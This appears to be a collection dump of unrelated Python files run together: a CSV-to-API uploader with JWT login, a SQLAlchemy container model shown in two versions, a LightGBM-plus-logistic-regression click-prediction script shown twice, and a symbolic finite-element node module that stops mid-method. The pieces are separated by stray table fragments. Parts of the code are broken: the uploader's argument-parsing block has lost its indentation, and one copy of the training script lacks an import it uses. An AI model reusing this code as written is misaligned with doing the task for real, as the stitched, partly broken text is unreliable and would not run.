    print(username)
    credentials = {'username': username, 'password': password}
    response = requests.post(server, json=credentials)
    print(response.text)
    return response.json()
def write_fail_csv(entries: List, path: str):
    """Write the failed rows to *path* as CSV.

    ``newline=''`` is required by the csv module; without it every row is
    followed by a spurious blank line on Windows.
    """
    with open(path, 'w', newline='') as csv_f:
        csv_w = csv.writer(csv_f, delimiter=',')
        csv_w.writerows(entries)
def parse_csv_to_memory(csv_path: str) -> List[List]:
    """Read the whole CSV at *csv_path* into a list of row lists.

    This probably doesn't need to be a function but it's separated for
    testability and to do additional functionality when parsing CSVs.
    """
    # newline='' lets the csv module handle quoted embedded newlines correctly.
    with open(csv_path, newline='') as csv_f:
        csv_r = csv.reader(csv_f, delimiter=',')
        return [row for row in csv_r]
def load_csv_to_db(
    csv_data: List[List], entrymap: Dict, server: str, authkey: Dict,
    dry_run: bool = False
) -> List[List]:
    """Send every data row (header excluded) to the server.

    Returns the rows that were rejected, each extended with the posted
    payload, the response text and the status code.
    """
    failed_entries = []
    for row in csv_data[1:]:
        if not server:
            # No server address given: force a dry run with a placeholder.
            dry_run = True
            server = '0.0.0.0'
        status, text, payload = send_entry(
            server, row, entrymap, dry_run, authkey)
        if status not in {200, 201}:  # STATUS CODE not OK
            row.extend([payload, text, status])
            failed_entries.append(row)
    return failed_entries
def build_entrymap(csv_column_names: List, column_map: Dict) -> Dict:
    """Builds a db column name to csv column index mapping. If no mapping file
    is given, we naively create the mapping using the order of the rows.

    column_map provided should be {csv column name: db column name},
    not including the primary ID.

    The function returns {db column name: csv column index}
    """
    # Naive approach, assumes the csv column names matches the db column names
    db_content_names = csv_column_names[1:]
    if column_map is None:
        return {
            column_name: index
            for index, column_name in enumerate(db_content_names, start=1)
        }
    if len(column_map) != len(db_content_names):
        # BUG FIX: the original warning contained the typo "maping".
        print("WARNING: The db and csv column mapping file provided are "
              "mismatched in length. db column names are: "
              f"\n{db_content_names}\nThe provided column mapping "
              f"generated the following mapping: \n{column_map}")
    # Using mapping provided by user to create the mapping
    db_column_to_index_map = {}
    for csv_column_name, db_column_name in column_map.items():
        if csv_column_name not in db_content_names:
            # BUG FIX: the original warning text was garbled ("This may be
            # warning may be triggered"); rewritten for clarity.
            print(f"WARNING: {csv_column_name} not part of the db column "
                  f"names for values {db_content_names}. This warning may "
                  "be triggered by including the primary key in the "
                  "mapping file; remove that mapping entry to silence it.")
            continue
        db_column_to_index_map[db_column_name] = csv_column_names.index(
            csv_column_name)
    return db_column_to_index_map
def send_entry(
    server: str, entry: List, entrymap: Dict, dry_run: bool, authkey: Dict
) -> Tuple[int, str, Dict]:
    """Build the POST payload for one CSV row and (unless dry_run) submit it.

    Rows flagged in the duplicate column are skipped and reported as OK.
    Returns (status_code, response_text, payload).
    """
    payload = {}
    for db_column, idx in entrymap.items():
        if db_column == DUPLICATE_ARG_NAME:
            # Any value at all in the duplicate column means "skip this row".
            if entry[idx]:
                return 200, None, None
            continue
        payload[db_column] = entry[idx]
    print(payload)
    if dry_run:
        return 200, "Dry run, no response text", payload
    auth_headers = {'Authorization': 'JWT ' + authkey['access_token']}
    response = requests.post(server, json=payload, headers=auth_headers)
    print(response.status_code, response.text)
    return response.status_code, response.text, payload
def main(argv):
    """Drive the import: authenticate, parse the CSV, upload, report failures."""
    authkey = None
    if not argv.dry_run:
        authkey = generate_authkey(
            argv.auth_username, argv.auth_password, argv.auth_api)
    elif not argv.server_address:
        print("\nWARNING: A server address was not provided in args. "
              "Only printing results locally. Use the -h arg if you don't "
              "know what this means.\n")
    else:
        print("\nThis is a dry run. No data will be loaded to server whether "
              "a server_address has been provided or not.\n")
    csv_data = parse_csv_to_memory(argv.csv_path)
    if argv.entrymap_path is not None:
        with open(argv.entrymap_path, "r") as fp:
            column_map = json.load(fp)
        if argv.duplicate_column_name is not None:
            # Route the duplicate-marker column through the sentinel name.
            column_map[argv.duplicate_column_name] = DUPLICATE_ARG_NAME
    else:
        column_map = None
    entrymap = build_entrymap(
        csv_column_names=csv_data[0],
        column_map=column_map)
    failed_entries = load_csv_to_db(
        csv_data=csv_data,
        entrymap=entrymap,
        server=argv.server_address,
        authkey=authkey,
        dry_run=argv.dry_run)
    total_failed_entries = len(failed_entries)
    # BUG FIX: this was ``> 1``, which silently dropped the report (and the
    # failure CSV) whenever exactly one entry failed.
    if total_failed_entries > 0:
        print(
            "\nTHERE WERE {} ENTRIES THAT FAILED TO BE PROCESSED. "
            "PLEASE SEE \"{}\" TO DETERMINE IF THERE'S ANY DATA REMEDIATION "
            "THAT'S NEEDED.\n".format(
                total_failed_entries, argv.fail_csv_path))
        write_fail_csv(failed_entries, argv.fail_csv_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Parse a specifically formatted CSV')
parser.add_argument(
'--csv_path', '-c', dest='csv_path', required=True,
help='the path to the csv file')
parser.add_argument(
'--entrymap_path', '-e', dest='entrymap_path', required=False,
default=None,
help='the path to the JSON mapping file for db column names to csv'
' column names')
parser.add_argument(
'--dry_run', '-d', dest='dry_run', action='store_true',
help='performs a dry run locally when provided with a '
'server_address')
parser.add_argument(
'--fail_csv_path', '-f', dest='fail_csv_path',
default='./failed_entires.csv',
help='the path to drop a csv with failed entries')
parser.add_argument(
'--duplicate_column_name', '-dc', dest='duplicate_column_name',
required=False, default=None,
help='The column name where duplicate is marked and skipped. If there '
'are any values within that column, it will count as a hit.')
parser.add_argument(
'--server', '-s', dest='server_address', required=False,
help='the server address for the results to be uploaded')
parser.add_argument(
'--user', '-u', dest='auth_username', required=True,
help='the username to log in to the api with')
parser.add_argument(
'--pass', '-p', dest='auth_password', required=True,
help='the password to log in to the api with')
parser.add_argument(
'--auth', '-a', dest='auth_api', required=True,
help='the auth api')
args = parser.parse_args()
main(args) | 0.592784 | 0.183996 |
import sqlalchemy as sa
from sqlalchemy.exc import IntegrityError as IntegrityError
from server.common import fm_logger
from server.dbmodule import db_base
fmlogger = fm_logger.Logging()
class Container(db_base.Base):
    """ORM model for a built container image and its build status."""
    __tablename__ = 'container'
    __table_args__ = {'extend_existing': True}

    id = sa.Column(sa.Integer, primary_key=True)
    name = sa.Column(sa.String, nullable=False, unique=True)
    dep_target = sa.Column(sa.String)        # deployment target for the build
    status = sa.Column(sa.String)            # e.g. 'building' (set by insert())
    output_config = sa.Column(sa.Text)
    cont_store_path = sa.Column(sa.Text)     # path to the stored container artifacts

    def __init__(self):
        pass

    @classmethod
    def to_json(self, cont):
        # NOTE(review): declared @classmethod but the first parameter is named
        # ``self`` and unused — harmless, though ``cls`` would be conventional.
        # Serialize a Container row to a plain dict.
        cont_json = {}
        cont_json['id'] = cont.id
        cont_json['name'] = cont.name
        cont_json['dep_target'] = cont.dep_target
        cont_json['status'] = cont.status
        cont_json['output_config'] = str(cont.output_config)
        cont_json['cont_store_path'] = str(cont.cont_store_path)
        return cont_json

    def get(self, name):
        # Returns the row with this name, None when absent, or the ''
        # sentinel when the query raised.
        cont = ''
        try:
            session = db_base.get_session()
            cont = session.query(Container).filter_by(name=name).first()
            session.close()
        except IntegrityError as e:
            # NOTE(review): the session is not closed on this path (and
            # IntegrityError is unusual for a SELECT) — consider try/finally.
            fmlogger.debug(e)
        return cont

    def get_all(self):
        # Returns all rows, or the '' sentinel when the query raised.
        cont_list = ''
        try:
            session = db_base.get_session()
            cont_list = session.query(Container).all()
            session.close()
        except IntegrityError as e:
            # NOTE(review): session not closed on this path either.
            fmlogger.debug(e)
        return cont_list

    def insert(self, cont_data):
        # Populate this instance from the request payload and persist it.
        # Status always starts as 'building'.
        self.name = cont_data['cont_name']
        self.dep_target = cont_data['dep_target']
        self.status = 'building'
        self.output_config = ''
        self.cont_store_path = cont_data['cont_store_path']
        try:
            session = db_base.get_session()
            session.add(self)
            session.commit()
            session.close()
        except IntegrityError as e:
            # NOTE(review): on a duplicate name this swallows the error and
            # ``self.id`` below is presumably None/stale — confirm callers cope.
            fmlogger.debug(e)
        return self.id

    def update(self, cont_name, cont_data):
        # Partial update: only the keys present in cont_data are applied.
        try:
            session = db_base.get_session()
            cont = session.query(Container).filter_by(name=cont_name).first()
            if 'dep_target' in cont_data: cont.dep_target = cont_data['dep_target']
            if 'status' in cont_data: cont.status = cont_data['status']
            if 'output_config' in cont_data: cont.output_config = cont_data['output_config']
            session.commit()
            session.close()
        except IntegrityError as e:
            fmlogger.debug(e)

    def delete(self, cont_name):
        # Remove the row with this name; errors are logged, not raised.
        try:
            session = db_base.get_session()
            cont = session.query(Container).filter_by(name=cont_name).first()
            session.delete(cont)
            session.commit()
            session.close()
        except IntegrityError as e:
            fmlogger.debug(e) | server/dbmodule/objects/container.py | import sqlalchemy as sa
from sqlalchemy.exc import IntegrityError as IntegrityError
from server.common import fm_logger
from server.dbmodule import db_base
fmlogger = fm_logger.Logging()
class Container(db_base.Base):
    """ORM model and data-access helpers for a container build record."""

    __tablename__ = 'container'
    __table_args__ = {'extend_existing': True}

    id = sa.Column(sa.Integer, primary_key=True)
    name = sa.Column(sa.String, nullable=False, unique=True)
    dep_target = sa.Column(sa.String)
    status = sa.Column(sa.String)
    output_config = sa.Column(sa.Text)
    cont_store_path = sa.Column(sa.Text)

    def __init__(self):
        pass

    @classmethod
    def to_json(cls, cont):
        """Serialize *cont* into a JSON-friendly dict of its columns."""
        return {
            'id': cont.id,
            'name': cont.name,
            'dep_target': cont.dep_target,
            'status': cont.status,
            'output_config': str(cont.output_config),
            'cont_store_path': str(cont.cont_store_path),
        }

    def get(self, name):
        """Return the row named *name* (None if absent, '' on error)."""
        cont = ''
        session = db_base.get_session()
        try:
            cont = session.query(Container).filter_by(name=name).first()
        except IntegrityError as e:
            fmlogger.debug(e)
        finally:
            # the original leaked the session when the query raised
            session.close()
        return cont

    def get_all(self):
        """Return all container rows ('' on error)."""
        cont_list = ''
        session = db_base.get_session()
        try:
            cont_list = session.query(Container).all()
        except IntegrityError as e:
            fmlogger.debug(e)
        finally:
            session.close()
        return cont_list

    def insert(self, cont_data):
        """Populate this object from *cont_data* and persist it; return its id."""
        self.name = cont_data['cont_name']
        self.dep_target = cont_data['dep_target']
        self.status = 'building'
        self.output_config = ''
        self.cont_store_path = cont_data['cont_store_path']
        session = db_base.get_session()
        try:
            session.add(self)
            session.commit()
        except IntegrityError as e:
            fmlogger.debug(e)
        finally:
            session.close()
        return self.id

    def update(self, cont_name, cont_data):
        """Update dep_target/status/output_config of the row named *cont_name*."""
        session = db_base.get_session()
        try:
            cont = session.query(Container).filter_by(name=cont_name).first()
            if 'dep_target' in cont_data:
                cont.dep_target = cont_data['dep_target']
            if 'status' in cont_data:
                cont.status = cont_data['status']
            if 'output_config' in cont_data:
                cont.output_config = cont_data['output_config']
            session.commit()
        except IntegrityError as e:
            fmlogger.debug(e)
        finally:
            session.close()

    def delete(self, cont_name):
        """Delete the row named *cont_name*."""
        session = db_base.get_session()
        try:
            cont = session.query(Container).filter_by(name=cont_name).first()
            session.delete(cont)
            session.commit()
        except IntegrityError as e:
            fmlogger.debug(e)
        finally:
            session.close()
import os
import pandas as pd
import lightgbm as lgb
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import log_loss
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import LabelEncoder
def process_sparse_feats(data, cols):
    """Label-encode the categorical columns *cols* on a copy of *data*.

    Missing values are first replaced by the string '-1' so that they
    become an ordinary category for the encoder.
    """
    encoded = data.copy()
    for col in cols:
        encoded[col] = LabelEncoder().fit_transform(encoded[col].fillna('-1'))
    return encoded
if __name__ == '__main__':
    # Load data
    data_file = os.path.join('../data', 'criteo_sampled_data.csv')
    data = pd.read_csv(data_file)
    print('raw data shape: ', data.shape)

    # Clean / encode the sparse (categorical) features
    cols = data.columns
    dense_cols = [f for f in cols if f[0] == "I"]
    sparse_cols = [f for f in cols if f[0] == "C"]
    data = process_sparse_feats(data, sparse_cols)
    print('gbdt input data shape: ', data.shape)

    # Train/validation split.
    # .copy() fixes the original's pop() on a bare slice of `data`,
    # which mutates a view (pandas chained-assignment hazard).
    x_train = data[:500000].copy()
    y_train = x_train.pop('label')
    x_valid = data[500000:].copy()
    y_valid = x_valid.pop('label')

    # GBDT: 32 trees, 64 leaves each
    n_estimators = 32  # 50
    num_leaves = 64
    model = lgb.LGBMRegressor(objective='binary',
                              subsample=0.8,
                              min_child_weight=0.5,
                              colsample_bytree=0.8,
                              num_leaves=64,
                              learning_rate=0.1,
                              n_estimators=32,
                              random_state=2020)
    model.fit(x_train, y_train,
              eval_set=[(x_train, y_train), (x_valid, y_valid)],
              eval_names=['train', 'val'],
              eval_metric='binary_logloss',
              categorical_feature=sparse_cols,
              verbose=10)

    # Extract leaf indices: pred_leaf=True returns, for every sample,
    # the index of the leaf it lands in for each tree.
    gbdt_feats_train = model.predict(x_train, pred_leaf=True)
    print('gbdt output data shape with train: ', gbdt_feats_train.shape)
    print(gbdt_feats_train[:3])
    gbdt_feats_valid = model.predict(x_valid, pred_leaf=True)

    # Build a DataFrame of leaf indices (one column per tree) so that the
    # indices can be one-hot encoded as LR input features.
    gbdt_feats_name = ['gbdt_leaf_' + str(i) for i in range(n_estimators)]
    df_train_gbdt_feats = pd.DataFrame(gbdt_feats_train, columns=gbdt_feats_name)
    df_valid_gbdt_feats = pd.DataFrame(gbdt_feats_valid, columns=gbdt_feats_name)
    train_len = df_train_gbdt_feats.shape[0]
    data = pd.concat([df_train_gbdt_feats, df_valid_gbdt_feats])
    print('gbdt output data shape: ', data.shape)

    # One-hot encode the leaf index of every tree
    for col in gbdt_feats_name:
        onehot_feats = pd.get_dummies(data[col], prefix=col)
        data.drop([col], axis=1, inplace=True)
        data = pd.concat([data, onehot_feats], axis=1)
    print('lr input data shape: ', data.shape)

    # Split back into train/validation (positional slicing)
    train = data[: train_len]
    valid = data[train_len:]

    # Train the logistic regression on the one-hot leaf features
    lr = LogisticRegression(C=5, solver='sag')
    lr.fit(train, y_train)

    # Cross-entropy loss
    train_logloss = log_loss(y_train, lr.predict_proba(train)[:, 1])
    print('tr-logloss: ', train_logloss)
    valid_logloss = log_loss(y_valid, lr.predict_proba(valid)[:, 1])
    print('val-logloss: ', valid_logloss)

    # AUC on the validation split
    auc_score = roc_auc_score(y_valid, lr.predict_proba(valid)[:, 1])
    print('val-auc: ', auc_score)
import pandas as pd
import lightgbm as lgb
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import log_loss
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import LabelEncoder
def process_sparse_feats(data, cols):
    """Label-encode the categorical columns *cols* on a copy of *data*.

    Missing values are first replaced by the string '-1' so that they
    become an ordinary category for the encoder.
    """
    encoded = data.copy()
    for col in cols:
        encoded[col] = LabelEncoder().fit_transform(encoded[col].fillna('-1'))
    return encoded
if __name__ == '__main__':
    # Load data
    data_file = os.path.join('../data', 'criteo_sampled_data.csv')
    data = pd.read_csv(data_file)
    print('raw data shape: ', data.shape)

    # Clean / encode the sparse (categorical) features
    cols = data.columns
    dense_cols = [f for f in cols if f[0] == "I"]
    sparse_cols = [f for f in cols if f[0] == "C"]
    data = process_sparse_feats(data, sparse_cols)
    print('gbdt input data shape: ', data.shape)

    # Train/validation split.
    # .copy() fixes the original's pop() on a bare slice of `data`,
    # which mutates a view (pandas chained-assignment hazard).
    x_train = data[:500000].copy()
    y_train = x_train.pop('label')
    x_valid = data[500000:].copy()
    y_valid = x_valid.pop('label')

    # GBDT: 32 trees, 64 leaves each
    n_estimators = 32  # 50
    num_leaves = 64
    model = lgb.LGBMRegressor(objective='binary',
                              subsample=0.8,
                              min_child_weight=0.5,
                              colsample_bytree=0.8,
                              num_leaves=64,
                              learning_rate=0.1,
                              n_estimators=32,
                              random_state=2020)
    model.fit(x_train, y_train,
              eval_set=[(x_train, y_train), (x_valid, y_valid)],
              eval_names=['train', 'val'],
              eval_metric='binary_logloss',
              categorical_feature=sparse_cols,
              verbose=10)

    # Extract leaf indices: pred_leaf=True returns, for every sample,
    # the index of the leaf it lands in for each tree.
    gbdt_feats_train = model.predict(x_train, pred_leaf=True)
    print('gbdt output data shape with train: ', gbdt_feats_train.shape)
    print(gbdt_feats_train[:3])
    gbdt_feats_valid = model.predict(x_valid, pred_leaf=True)

    # Build a DataFrame of leaf indices (one column per tree) so that the
    # indices can be one-hot encoded as LR input features.
    gbdt_feats_name = ['gbdt_leaf_' + str(i) for i in range(n_estimators)]
    df_train_gbdt_feats = pd.DataFrame(gbdt_feats_train, columns=gbdt_feats_name)
    df_valid_gbdt_feats = pd.DataFrame(gbdt_feats_valid, columns=gbdt_feats_name)
    train_len = df_train_gbdt_feats.shape[0]
    data = pd.concat([df_train_gbdt_feats, df_valid_gbdt_feats])
    print('gbdt output data shape: ', data.shape)

    # One-hot encode the leaf index of every tree
    for col in gbdt_feats_name:
        onehot_feats = pd.get_dummies(data[col], prefix=col)
        data.drop([col], axis=1, inplace=True)
        data = pd.concat([data, onehot_feats], axis=1)
    print('lr input data shape: ', data.shape)

    # Split back into train/validation (positional slicing)
    train = data[: train_len]
    valid = data[train_len:]

    # Train the logistic regression on the one-hot leaf features
    lr = LogisticRegression(C=5, solver='sag')
    lr.fit(train, y_train)

    # Cross-entropy loss
    train_logloss = log_loss(y_train, lr.predict_proba(train)[:, 1])
    print('tr-logloss: ', train_logloss)
    valid_logloss = log_loss(y_valid, lr.predict_proba(valid)[:, 1])
    print('val-logloss: ', valid_logloss)

    # AUC on the validation split
    auc_score = roc_auc_score(y_valid, lr.predict_proba(valid)[:, 1])
    print('val-auc: ', auc_score)
from collections import OrderedDict
from itertools import product
from sympy import Basic
from sympy.core.singleton import Singleton
from sympy.core.compatibility import with_metaclass
from sympy.core.containers import Tuple
from sympy import AtomicExpr
from sympde.topology import ScalarTestFunction, VectorTestFunction
from sympde.topology import (dx1, dx2, dx3)
from sympde.topology import Mapping
from sympde.topology import SymbolicDeterminant
from sympde.topology import SymbolicInverseDeterminant
from sympde.topology import SymbolicWeightedVolume
from sympde.topology import IdentityMapping
#==============================================================================
# TODO move it
import string
import random
def random_string( n ):
    """Return a random string of *n* lowercase letters and digits,
    drawn from the OS-provided entropy source (SystemRandom)."""
    alphabet = string.ascii_lowercase + string.digits
    rng = random.SystemRandom()
    return ''.join(rng.choice(alphabet) for _ in range(n))
#==============================================================================
class ArityType(with_metaclass(Singleton, Basic)):
    """Base class representing a form type: bilinear/linear/functional"""
    pass

class BilinearArity(ArityType):
    """Tag for bilinear forms."""
    pass

class LinearArity(ArityType):
    """Tag for linear forms."""
    pass

class FunctionalArity(ArityType):
    """Tag for functionals."""
    pass

#==============================================================================
class IndexNode(with_metaclass(Singleton, Basic)):
    """Base class representing one index of an iterator"""
    pass

class IndexElement(IndexNode):
    """Index over elements."""
    pass

class IndexQuadrature(IndexNode):
    """Index over quadrature points."""
    pass

class IndexDof(IndexNode):
    """Index over degrees of freedom."""
    pass

class IndexDofTrial(IndexNode):
    """Index over trial degrees of freedom."""
    pass

class IndexDofTest(IndexNode):
    """Index over test degrees of freedom."""
    pass

class IndexDerivative(IndexNode):
    """Index over derivatives."""
    pass

# module-level singleton instances (the classes use a Singleton metaclass)
index_element   = IndexElement()
index_quad      = IndexQuadrature()
index_dof       = IndexDof()
index_dof_trial = IndexDofTrial()
index_dof_test  = IndexDofTest()
index_deriv     = IndexDerivative()

#==============================================================================
class LengthNode(with_metaclass(Singleton, Basic)):
    """Base class representing one length of an iterator"""
    pass

class LengthElement(LengthNode):
    """Number of elements."""
    pass

class LengthQuadrature(LengthNode):
    """Number of quadrature points."""
    pass

class LengthDof(LengthNode):
    """Number of degrees of freedom."""
    pass

class LengthDofTrial(LengthNode):
    """Number of trial degrees of freedom."""
    pass

class LengthDofTest(LengthNode):
    """Number of test degrees of freedom."""
    pass

length_element   = LengthElement()
length_quad      = LengthQuadrature()
length_dof       = LengthDof()
length_dof_trial = LengthDofTrial()
length_dof_test  = LengthDofTest()

#==============================================================================
class RankNode(with_metaclass(Singleton, Basic)):
    """Base class representing a rank of an iterator"""
    pass

class RankDimension(RankNode):
    """Symbolic rank equal to the space dimension."""
    pass

rank_dim = RankDimension()
#==============================================================================
class BaseNode(Basic):
    """Base class for all nodes of the loop description."""
    pass

#==============================================================================
class Element(BaseNode):
    """A generic element produced when iterating over a generator."""
    pass

#==============================================================================
class Pattern(Tuple):
    """Index pattern of an array: one entry (index or None) per array axis."""
    pass

#==============================================================================
class IteratorBase(BaseNode):
    """Iterator over a target object, with optional dummy indices."""

    def __new__(cls, target, dummies=None):
        # normalize dummies to a sympy Tuple (idiomatic `is not None` check)
        if dummies is not None:
            if not isinstance(dummies, (list, tuple, Tuple)):
                dummies = [dummies]
            dummies = Tuple(*dummies)

        return Basic.__new__(cls, target, dummies)

    @property
    def target(self):
        return self._args[0]

    @property
    def dummies(self):
        return self._args[1]

#==============================================================================
class TensorIterator(IteratorBase):
    pass

#==============================================================================
class ProductIterator(IteratorBase):
    pass

#==============================================================================
# TODO dummies should not be None
class GeneratorBase(BaseNode):
    """Generator yielding data of an ArrayNode/MatrixNode along dummy indices."""

    def __new__(cls, target, dummies):
        if not isinstance(dummies, (list, tuple, Tuple)):
            dummies = [dummies]
        dummies = Tuple(*dummies)

        if not isinstance(target, (ArrayNode, MatrixNode)):
            # message now matches the actually accepted types
            # (original said only 'ArrayNode' while also accepting MatrixNode)
            raise TypeError('expecting an ArrayNode or MatrixNode')

        return Basic.__new__(cls, target, dummies)

    @property
    def target(self):
        return self._args[0]

    @property
    def dummies(self):
        return self._args[1]

#==============================================================================
class TensorGenerator(GeneratorBase):
    pass

#==============================================================================
class ProductGenerator(GeneratorBase):
    pass
#==============================================================================
class Grid(BaseNode):
    """The computational grid."""
    pass

#==============================================================================
class ScalarNode(BaseNode, AtomicExpr):
    """A scalar (rank-0) node."""
    pass

#==============================================================================
class ArrayNode(BaseNode, AtomicExpr):
    """An array-like node with a fixed rank and named index positions."""

    _rank           = None
    _positions      = None
    _free_positions = None

    @property
    def rank(self):
        return self._rank

    @property
    def positions(self):
        return self._positions

    @property
    def free_positions(self):
        # default to every known position when no explicit subset is given
        if self._free_positions is None:
            return list(self.positions.keys())
        return self._free_positions

    def pattern(self, args=None):
        """Return the Pattern for the given free positions (all by default)."""
        if args is None:
            args = self.free_positions

        slots = [None] * self.rank
        for key in args:
            slots[self.positions[key]] = key
        return Pattern(*slots)

#==============================================================================
class MatrixNode(BaseNode, AtomicExpr):
    """A matrix-like node with a fixed rank."""

    _rank = None

    @property
    def rank(self):
        return self._rank

    def pattern(self, positions):
        raise NotImplementedError('TODO')

#==============================================================================
class GlobalTensorQuadrature(ArrayNode):
    """Quadrature data over the whole grid: axes (element, quad point)."""
    _rank           = 2
    _positions      = {index_element: 0, index_quad: 1}
    _free_positions = [index_element]

#==============================================================================
class LocalTensorQuadrature(ArrayNode):
    # TODO add set_positions
    """Quadrature data on one element: single quad-point axis."""
    _rank      = 1
    _positions = {index_quad: 0}

#==============================================================================
class TensorQuadrature(ScalarNode):
    """Quadrature data at a single point."""
    pass

#==============================================================================
class MatrixQuadrature(MatrixNode):
    """Matrix of values at the quadrature points of a target expression."""

    _rank = rank_dim

    def __new__(cls, target):
        # TODO check target
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class WeightedVolumeQuadrature(ScalarNode):
    """Weighted volume contribution at a quadrature point."""
    pass
#==============================================================================
def _expect_test_function(target):
    # shared argument check for all basis nodes below
    if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
        raise TypeError('Expecting a scalar/vector test function')

class GlobalTensorQuadratureBasis(ArrayNode):
    """Basis data over the grid; axes (element, dof, derivative, quad point)."""
    _rank           = 4
    _positions      = {index_quad: 3, index_deriv: 2, index_dof: 1, index_element: 0}
    _free_positions = [index_element]

    def __new__(cls, target):
        _expect_test_function(target)
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class LocalTensorQuadratureBasis(ArrayNode):
    """Basis data on one element; axes (dof, derivative, quad point)."""
    _rank           = 3
    _positions      = {index_quad: 2, index_deriv: 1, index_dof: 0}
    _free_positions = [index_dof]

    def __new__(cls, target):
        _expect_test_function(target)
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class TensorQuadratureBasis(ArrayNode):
    """Basis data for one dof; axes (derivative, quad point)."""
    _rank           = 2
    _positions      = {index_quad: 1, index_deriv: 0}
    _free_positions = [index_quad]

    def __new__(cls, target):
        _expect_test_function(target)
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class CoefficientBasis(ScalarNode):
    """Scalar coefficient attached to a test function."""

    def __new__(cls, target):
        _expect_test_function(target)
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class TensorBasis(CoefficientBasis):
    pass

#==============================================================================
class GlobalTensorQuadratureTestBasis(GlobalTensorQuadratureBasis):
    _positions = {index_quad: 3, index_deriv: 2, index_dof_test: 1, index_element: 0}

#==============================================================================
class LocalTensorQuadratureTestBasis(LocalTensorQuadratureBasis):
    _positions      = {index_quad: 2, index_deriv: 1, index_dof_test: 0}
    _free_positions = [index_dof_test]

#==============================================================================
class TensorQuadratureTestBasis(TensorQuadratureBasis):
    pass

#==============================================================================
class TensorTestBasis(TensorBasis):
    pass

#==============================================================================
class GlobalTensorQuadratureTrialBasis(GlobalTensorQuadratureBasis):
    _positions = {index_quad: 3, index_deriv: 2, index_dof_trial: 1, index_element: 0}

#==============================================================================
class LocalTensorQuadratureTrialBasis(LocalTensorQuadratureBasis):
    _positions      = {index_quad: 2, index_deriv: 1, index_dof_trial: 0}
    _free_positions = [index_dof_trial]

#==============================================================================
class TensorQuadratureTrialBasis(TensorQuadratureBasis):
    pass

#==============================================================================
class TensorTrialBasis(TensorBasis):
    pass
#==============================================================================
class MatrixLocalBasis(MatrixNode):
    """
    used to describe local dof over an element
    """
    _rank = rank_dim

    def __new__(cls, target):
        # TODO check target
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class StencilMatrixLocalBasis(MatrixNode):
    """
    used to describe local dof over an element as a stencil matrix
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        # a stencil matrix has two axes per space dimension
        return Basic.__new__(cls, pads, 2 * len(pads), random_string( 6 ))

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]

#==============================================================================
class StencilVectorLocalBasis(MatrixNode):
    """
    used to describe local dof over an element as a stencil vector
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        # a stencil vector has one axis per space dimension
        return Basic.__new__(cls, pads, len(pads), random_string( 6 ))

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]

#==============================================================================
class StencilMatrixGlobalBasis(MatrixNode):
    """
    used to describe local dof over an element as a stencil matrix
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        return Basic.__new__(cls, pads, 2 * len(pads), random_string( 6 ))

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]

#==============================================================================
class StencilVectorGlobalBasis(MatrixNode):
    """
    used to describe local dof over an element as a stencil vector
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        return Basic.__new__(cls, pads, len(pads), random_string( 6 ))

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]
#==============================================================================
class GlobalSpan(ArrayNode):
    """Span data over the grid: a single element axis."""
    _rank      = 1
    _positions = {index_element: 0}

    def __new__(cls, target):
        if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
            raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class Span(ScalarNode):
    """Span value for a single element; the target is optional."""

    def __new__(cls, target=None):
        # validate only when a target is actually given
        if target is not None:
            if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
                raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class Evaluation(BaseNode):
    """Base class for evaluation nodes."""
    pass

#==============================================================================
class FieldEvaluation(Evaluation):
    """Evaluation of a field."""
    pass

#==============================================================================
class MappingEvaluation(Evaluation):
    """Evaluation of a mapping."""
    pass
#==============================================================================
class ComputeNode(Basic):
    """Node wrapping an expression that must be computed."""

    def __new__(cls, expr):
        return Basic.__new__(cls, expr)

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class ComputePhysical(ComputeNode):
    """Computation in physical coordinates."""
    pass

#==============================================================================
class ComputePhysicalBasis(ComputePhysical):
    """Computation of a physical basis expression."""
    pass

#==============================================================================
class ComputeKernelExpr(ComputeNode):
    """Computation of a kernel expression."""
    pass

#==============================================================================
class ComputeLogical(ComputeNode):
    """Computation in logical coordinates."""
    pass

#==============================================================================
class ComputeLogicalBasis(ComputeLogical):
    """Computation of a logical basis expression."""
    pass

#==============================================================================
class Reduction(Basic):
    """A reduction `lhs op= expr` with an optional lhs."""

    def __new__(cls, op, expr, lhs=None):
        # TODO add verification on op = '-', '+', '*', '/'
        return Basic.__new__(cls, op, expr, lhs)

    @property
    def op(self):
        return self._args[0]

    @property
    def expr(self):
        return self._args[1]

    @property
    def lhs(self):
